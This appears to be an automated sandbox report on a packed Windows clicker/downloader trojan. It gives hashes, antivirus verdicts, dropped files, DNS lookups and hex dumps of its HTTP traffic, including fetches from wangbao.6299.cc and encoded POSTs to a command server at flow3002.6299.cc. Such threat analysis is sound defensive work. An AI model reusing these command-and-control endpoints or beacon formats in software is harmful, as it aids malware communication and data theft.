Analysis Date: 2015-01-20 19:46:15
MD5: 03f361f5a4ab6871cd39b8460c4f662a
SHA1: dac9fb7d30f352ac66ec2ce3c404db941bce2227

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section UPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0 (size 0: these are the MD5 and SHA1 digests of empty input)
Section UPX1 md5: ea1381db2e946a01c63f974f8bc23c44 sha1: dcce274c7ed56bba27ebc32f88fa93dd6b63adde size: 67072
Section .rsrc md5: 7473cf07c0128101ef1e0d0db6cda15f sha1: 8f8a0bb703878b9754182680e9052b0598a6d175 size: 3072
Timestamp: 2014-11-29 06:37:50
Version info:
LegalCopyright: 版权所有 (C) 2014
InternalName: OverbearingWeb
FileVersion: 1, 0, 0, 1
CompanyName:
LegalTrademarks:
ProductName: OverbearingWeb 应用程序
ProductVersion: 1, 0, 0, 1
FileDescription: OverbearingWeb Microsoft 基础类应用程序
OriginalFilename: OverbearingWeb.EXE
Packer: UPX -> www.upx.sourceforge.net
PEhash: d35eadd9df26e932699227a635ee44ee972b9188
IMPhash: 843a92137552816abbed133539d1f2f9
AV 360 Safe: no_virus
AV Ad-Aware: Trojan.Generic.12520079
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir): Trojan.Generic.12520079
AV Authentium: W32/Downloader-Web-based!Maximu
AV Avira (antivir): TR/Agent.69632.608
AV BullGuard: Trojan.Generic.12520079
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV Emsisoft: Trojan.Generic.12520079
AV Eset (nod32): Win32/Agent.WEW
AV Fortinet: W32/Agent.CBIV!tr
AV Frisk (f-prot): W32/Downloader-Web-based!Maximu
AV F-Secure: Trojan.Generic.12520079
AV Grisoft (avg): Agent4.CAYO.dropper
AV Ikarus: Trojan-Clicker.Win32.Agent
AV K7: Trojan ( 004a0a271 )
AV Kaspersky: Trojan-Clicker.Win32.Agent.cbiv
AV MalwareBytes: no_virus
AV Mcafee: RDN/Generic.grp!hl
AV Microsoft Security Essentials: no_virus
AV MicroWorld (escan): Trojan.Generic.12520079
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: Backdoor.Trojan
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): TrojanClicker.Agent

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\WINDOWS\dac9fb7d30f352ac66ec2ce3c404db941bce2227.INI (the file name is the sample's SHA1 listed above)
Creates File: C:\chrome.exe
Creates Mutex: sdfadfwefawCOverbearingWebAppefaefaf
Winsock URL: http://wangbao.6299.cc/xc.txt
Winsock URL: http://www.ip138.com

Network Details:

DNS: yd.ecoma.glb0.lxdns.com
Type: A
61.140.13.81
DNS: yd.ecoma.glb0.lxdns.com
Type: A
61.140.13.85
DNS: yd.ecoma.glb0.lxdns.com
Type: A
61.140.13.87
DNS: yd.ecoma.glb0.lxdns.com
Type: A
61.140.13.80
DNS: 2c20bdadcc004a3d.cdn.fhldns.com
Type: A
222.216.190.60
DNS: 2c20bdadcc004a3d.cdn.fhldns.com
Type: A
61.155.149.77
DNS: flow3002.6299.cc
Type: A
218.85.133.70
DNS: www.ip138.com
Type: A
DNS: wangbao.6299.cc
Type: A
HTTP GET: http://www.ip138.com/
User-Agent: Mozilla/4.0 (compatible)
HTTP GET: http://wangbao.6299.cc/xc.txt
User-Agent: Mozilla/4.0 (compatible)
HTTP GET: http://www.ip138.com/
User-Agent: Mozilla/4.0 (compatible)
HTTP POST: http://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
User-Agent: Mozilla/4.0 (compatible)
HTTP POST: http://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
User-Agent: Mozilla/4.0 (compatible)
HTTP GET: http://www.ip138.com/
User-Agent: Mozilla/4.0 (compatible)
HTTP POST: http://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
User-Agent: Mozilla/4.0 (compatible)
HTTP GET: http://www.ip138.com/
User-Agent: Mozilla/4.0 (compatible)
HTTP POST: http://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
User-Agent: Mozilla/4.0 (compatible)
HTTP GET: http://www.ip138.com/
User-Agent: Mozilla/4.0 (compatible)
HTTP POST: http://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
User-Agent: Mozilla/4.0 (compatible)
HTTP GET: http://www.ip138.com/
User-Agent: Mozilla/4.0 (compatible)
HTTP POST: http://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
User-Agent: Mozilla/4.0 (compatible)
Flows TCP: 192.168.1.1:1031 ➝ 61.140.13.81:80
Flows TCP: 192.168.1.1:1032 ➝ 222.216.190.60:80
Flows TCP: 192.168.1.1:1033 ➝ 61.140.13.81:80
Flows TCP: 192.168.1.1:1034 ➝ 218.85.133.70:80
Flows TCP: 192.168.1.1:1035 ➝ 218.85.133.70:80
Flows TCP: 192.168.1.1:1036 ➝ 61.140.13.81:80
Flows TCP: 192.168.1.1:1037 ➝ 218.85.133.70:80
Flows TCP: 192.168.1.1:1038 ➝ 61.140.13.81:80
Flows TCP: 192.168.1.1:1039 ➝ 218.85.133.70:80
Flows TCP: 192.168.1.1:1040 ➝ 61.140.13.81:80
Flows TCP: 192.168.1.1:1041 ➝ 218.85.133.70:80
Flows TCP: 192.168.1.1:1042 ➝ 61.140.13.81:80
Flows TCP: 192.168.1.1:1043 ➝ 218.85.133.70:80

Raw Pcap (outbound request buffers; note that several dumps below carry stale bytes from earlier traffic after the request's terminating CRLF CRLF or after the declared Content-Length — e.g. the tail of a "404 Not Found" HTML response and of an earlier POST body appended to the "GET /" requests — so only the bytes up to the blank line, or up to Content-Length bytes of body, represent the request as sent)
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c6529 0d0a486f 73743a20 7777772e   ble)..Host: www.
0x00000040 (00064)   69703133 382e636f 6d0d0a0d 0a         ip138.com....

0x00000000 (00000)   47455420 2f78632e 74787420 48545450   GET /xc.txt HTTP
0x00000010 (00016)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000020 (00032)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000030 (00048)   6f6d7061 7469626c 65290d0a 486f7374   ompatible)..Host
0x00000040 (00064)   3a207761 6e676261 6f2e3632 39392e63   : wangbao.6299.c
0x00000050 (00080)   630d0a0d 0a                           c....

0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c6529 0d0a486f 73743a20 7777772e   ble)..Host: www.
0x00000040 (00064)   69703133 382e636f 6d0d0a0d 0a392e63   ip138.com....9.c
0x00000050 (00080)   630d0a0d 0a                           c....

0x00000000 (00000)   504f5354 202f436c 69656e74 4150492f   POST /ClientAPI/
0x00000010 (00016)   666c6f77 7461736b 4150492e 61737078   flowtaskAPI.aspx
0x00000020 (00032)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 436f6e74 656e742d   t: */*..Content-
0x00000040 (00064)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2032 39350d0a 43616368   ength: 295..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d4441   che....parems=DA
0x000000e0 (00224)   46333130 46333334 32323845 34433545   F310F334228E4C5E
0x000000f0 (00240)   33304246 32304330 46443332 35314537   30BF20C0FD3251E7
0x00000100 (00256)   37383330 43453244 34444234 44424136   7830CE2D4DB4DBA6
0x00000110 (00272)   44423334 36343533 37314434 39334433   DB34645371D493D3
0x00000120 (00288)   41463846 38393534 31413639 41343330   AF8F89541A69A430
0x00000130 (00304)   33374131 38373138 46344434 39323733   37A18718F4D49273
0x00000140 (00320)   38454539 44443841 34434244 42324239   8EE9DD8A4CBDB2B9
0x00000150 (00336)   42374645 31414531 33383534 38413641   B7FE1AE138548A6A
0x00000160 (00352)   45373633 38424146 43353541 34374439   E7638BAFC55A47D9
0x00000170 (00368)   31433238 43324638 32323532 42463042   1C28C2F82252BF0B
0x00000180 (00384)   37333333 42394633 34373331 33383936   7333B9F347313896
0x00000190 (00400)   36433642 33323941 35433235 45423945   6C6B329A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8

0x00000000 (00000)   504f5354 202f436c 69656e74 4150492f   POST /ClientAPI/
0x00000010 (00016)   666c6f77 7461736b 4150492e 61737078   flowtaskAPI.aspx
0x00000020 (00032)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 436f6e74 656e742d   t: */*..Content-
0x00000040 (00064)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2031 36370d0a 43616368   ength: 167..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d3734   che....parems=74
0x000000e0 (00224)   33324139 35364236 32433731 31323242   32A956B62C71122B
0x000000f0 (00240)   34453137 43454637 33333330 45373737   4E17CEF73330E777
0x00000100 (00256)   37454431 31424534 41433544 45343939   7ED11BE4AC5DE499
0x00000110 (00272)   36374431 32344431 33434546 39384546   67D124D13CEF98EF
0x00000120 (00288)   38313043 43314543 31433432 33394332   810CC1EC1C4239C2
0x00000130 (00304)   37434341 34424245 31363144 46313741   7CCA4BBE161DF17A
0x00000140 (00320)   44424531 42394245 39313643 41353342   DBE1B9BE916CA53B
0x00000150 (00336)   42303839 37334535 35463134 32423941   B08973E55F142B9A
0x00000160 (00352)   32363046 33314632 44453242 42443439   260F31F2DE2BBD49
0x00000170 (00368)   31423346 30344430 41303444 36456472   1B3F04D0A04D6Edr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c6529 0d0a486f 73743a20 7777772e   ble)..Host: www.
0x00000040 (00064)   69703133 382e636f 6d0d0a0d 0a2d5479   ip138.com....-Ty
0x00000050 (00080)   70653a20 74657874 2f68746d 6c0d0a44   pe: text/html..D
0x00000060 (00096)   6174653a 20547565 2c203230 204a616e   ate: Tue, 20 Jan
0x00000070 (00112)   20323031 35203139 3a35323a 30312047    2015 19:52:01 G
0x00000080 (00128)   4d540d0a 0d0a3c68 746d6c3e 0a20203c   MT....<html>.  <
0x00000090 (00144)   68656164 3e0a2020 20203c74 69746c65   head>.    <title
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a41 35433235 45423945   /html>.A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8

0x00000000 (00000)   504f5354 202f436c 69656e74 4150492f   POST /ClientAPI/
0x00000010 (00016)   666c6f77 7461736b 4150492e 61737078   flowtaskAPI.aspx
0x00000020 (00032)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 436f6e74 656e742d   t: */*..Content-
0x00000040 (00064)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2031 36370d0a 43616368   ength: 167..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d3734   che....parems=74
0x000000e0 (00224)   33324139 35364236 32433731 31323242   32A956B62C71122B
0x000000f0 (00240)   34453137 43454637 33333330 45373737   4E17CEF73330E777
0x00000100 (00256)   37454431 31424534 41433544 45343939   7ED11BE4AC5DE499
0x00000110 (00272)   36374431 32344431 33434546 39384546   67D124D13CEF98EF
0x00000120 (00288)   38313043 43314543 31433432 33394332   810CC1EC1C4239C2
0x00000130 (00304)   37434341 34424245 31363144 46313741   7CCA4BBE161DF17A
0x00000140 (00320)   44424531 42394245 39313643 41353342   DBE1B9BE916CA53B
0x00000150 (00336)   42303839 37334535 35463134 32423941   B08973E55F142B9A
0x00000160 (00352)   32363046 33314632 44453242 42443439   260F31F2DE2BBD49
0x00000170 (00368)   31423346 30344430 41303444 36456472   1B3F04D0A04D6Edr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a41 35433235 45423945   /html>.A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8

0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c6529 0d0a486f 73743a20 7777772e   ble)..Host: www.
0x00000040 (00064)   69703133 382e636f 6d0d0a0d 0a74696f   ip138.com....tio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2031 36370d0a 43616368   ength: 167..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d3734   che....parems=74
0x000000e0 (00224)   33324139 35364236 32433731 31323242   32A956B62C71122B
0x000000f0 (00240)   34453137 43454637 33333330 45373737   4E17CEF73330E777
0x00000100 (00256)   37454431 31424534 41433544 45343939   7ED11BE4AC5DE499
0x00000110 (00272)   36374431 32344431 33434546 39384546   67D124D13CEF98EF
0x00000120 (00288)   38313043 43314543 31433432 33394332   810CC1EC1C4239C2
0x00000130 (00304)   37434341 34424245 31363144 46313741   7CCA4BBE161DF17A
0x00000140 (00320)   44424531 42394245 39313643 41353342   DBE1B9BE916CA53B
0x00000150 (00336)   42303839 37334535 35463134 32423941   B08973E55F142B9A
0x00000160 (00352)   32363046 33314632 44453242 42443439   260F31F2DE2BBD49
0x00000170 (00368)   31423346 30344430 41303444 36456472   1B3F04D0A04D6Edr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a41 35433235 45423945   /html>.A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8

0x00000000 (00000)   504f5354 202f436c 69656e74 4150492f   POST /ClientAPI/
0x00000010 (00016)   666c6f77 7461736b 4150492e 61737078   flowtaskAPI.aspx
0x00000020 (00032)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 436f6e74 656e742d   t: */*..Content-
0x00000040 (00064)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2031 36370d0a 43616368   ength: 167..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d3734   che....parems=74
0x000000e0 (00224)   33324139 35364236 32433731 31323242   32A956B62C71122B
0x000000f0 (00240)   34453137 43454637 33333330 45373737   4E17CEF73330E777
0x00000100 (00256)   37454431 31424534 41433544 45343939   7ED11BE4AC5DE499
0x00000110 (00272)   36374431 32344431 33434546 39384546   67D124D13CEF98EF
0x00000120 (00288)   38313043 43314543 31433432 33394332   810CC1EC1C4239C2
0x00000130 (00304)   37434341 34424245 31363144 46313741   7CCA4BBE161DF17A
0x00000140 (00320)   44424531 42394245 39313643 41353342   DBE1B9BE916CA53B
0x00000150 (00336)   42303839 37334535 35463134 32423941   B08973E55F142B9A
0x00000160 (00352)   32363046 33314632 44453242 42443439   260F31F2DE2BBD49
0x00000170 (00368)   31423346 30344430 41303444 36456472   1B3F04D0A04D6Edr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a41 35433235 45423945   /html>.A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8

0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c6529 0d0a486f 73743a20 7777772e   ble)..Host: www.
0x00000040 (00064)   69703133 382e636f 6d0d0a0d 0a74696f   ip138.com....tio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2031 36370d0a 43616368   ength: 167..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d3734   che....parems=74
0x000000e0 (00224)   33324139 35364236 32433731 31323242   32A956B62C71122B
0x000000f0 (00240)   34453137 43454637 33333330 45373737   4E17CEF73330E777
0x00000100 (00256)   37454431 31424534 41433544 45343939   7ED11BE4AC5DE499
0x00000110 (00272)   36374431 32344431 33434546 39384546   67D124D13CEF98EF
0x00000120 (00288)   38313043 43314543 31433432 33394332   810CC1EC1C4239C2
0x00000130 (00304)   37434341 34424245 31363144 46313741   7CCA4BBE161DF17A
0x00000140 (00320)   44424531 42394245 39313643 41353342   DBE1B9BE916CA53B
0x00000150 (00336)   42303839 37334535 35463134 32423941   B08973E55F142B9A
0x00000160 (00352)   32363046 33314632 44453242 42443439   260F31F2DE2BBD49
0x00000170 (00368)   31423346 30344430 41303444 36456472   1B3F04D0A04D6Edr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a41 35433235 45423945   /html>.A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8

0x00000000 (00000)   504f5354 202f436c 69656e74 4150492f   POST /ClientAPI/
0x00000010 (00016)   666c6f77 7461736b 4150492e 61737078   flowtaskAPI.aspx
0x00000020 (00032)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 436f6e74 656e742d   t: */*..Content-
0x00000040 (00064)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2031 36370d0a 43616368   ength: 167..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d3734   che....parems=74
0x000000e0 (00224)   33324139 35364236 32433731 31323242   32A956B62C71122B
0x000000f0 (00240)   34453137 43454637 33333330 45373737   4E17CEF73330E777
0x00000100 (00256)   37454431 31424534 41433544 45343939   7ED11BE4AC5DE499
0x00000110 (00272)   36374431 32344431 33434546 39384546   67D124D13CEF98EF
0x00000120 (00288)   38313043 43314543 31433432 33394332   810CC1EC1C4239C2
0x00000130 (00304)   37434341 34424245 31363144 46313741   7CCA4BBE161DF17A
0x00000140 (00320)   44424531 42394245 39313643 41353342   DBE1B9BE916CA53B
0x00000150 (00336)   42303839 37334535 35463134 32423941   B08973E55F142B9A
0x00000160 (00352)   32363046 33314632 44453242 42443439   260F31F2DE2BBD49
0x00000170 (00368)   31423346 30344430 41303444 36456472   1B3F04D0A04D6Edr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a41 35433235 45423945   /html>.A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8

0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c6529 0d0a486f 73743a20 7777772e   ble)..Host: www.
0x00000040 (00064)   69703133 382e636f 6d0d0a0d 0a74696f   ip138.com....tio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2031 36370d0a 43616368   ength: 167..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d3734   che....parems=74
0x000000e0 (00224)   33324139 35364236 32433731 31323242   32A956B62C71122B
0x000000f0 (00240)   34453137 43454637 33333330 45373737   4E17CEF73330E777
0x00000100 (00256)   37454431 31424534 41433544 45343939   7ED11BE4AC5DE499
0x00000110 (00272)   36374431 32344431 33434546 39384546   67D124D13CEF98EF
0x00000120 (00288)   38313043 43314543 31433432 33394332   810CC1EC1C4239C2
0x00000130 (00304)   37434341 34424245 31363144 46313741   7CCA4BBE161DF17A
0x00000140 (00320)   44424531 42394245 39313643 41353342   DBE1B9BE916CA53B
